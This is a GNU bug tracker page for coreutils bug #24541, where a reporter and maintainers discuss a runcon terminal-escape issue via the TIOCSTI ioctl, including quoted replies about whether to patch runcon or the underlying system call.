GNU bug report logs - #24541
runcon tty hijacking via TIOCSTI ioctl

Previous Next

Package: coreutils;

Reported by: up201407890 <at> alunos.dcc.fc.up.pt

Date: Sun, 25 Sep 2016 15:58:02 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.

Full log

View this message in rfc822 format

From: up201407890 <at> alunos.dcc.fc.up.pt
To: "Paul Eggert" <eggert <at> cs.ucla.edu>
Cc: 24541 <at> debbugs.gnu.org, SE-Linux <SELinux <at> tycho.nsa.gov>
Subject: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 08:38:11 +0200

Quoting "Paul Eggert" <eggert <at> cs.ucla.edu>:

Hello,

I set the bug report here before I got a response from Paul Moore
https://marc.info/?l=selinux&m=147481004710264&w=2

"I don't think we need to fix this for runcon, as it isn't as
sandboxing tool like sandbox, and the loss of job control would likely
be much more noticeable for runcon."


> up201407890 <at> alunos.dcc.fc.up.pt wrote re <http://bugs.gnu.org/24541>:
>> When executing a program via the runcon utility, the nonpriv session
>> can escape to the parent session by using the TIOCSTI ioctl to push
>> characters into the terminal's input buffer, allowing an attacker to
>> execute arbitrary commands without the SELinux security context.
>
> Thanks for the bug report. Surely this is a bug in the setexeccon  
> system call, not in the runcon command that uses the system call.  
> That being said, perhaps runcon should work around the bug via  
> something like the attached patch.
>



----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
This bug report was last modified 7 years and 270 days ago.

Previous Next

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.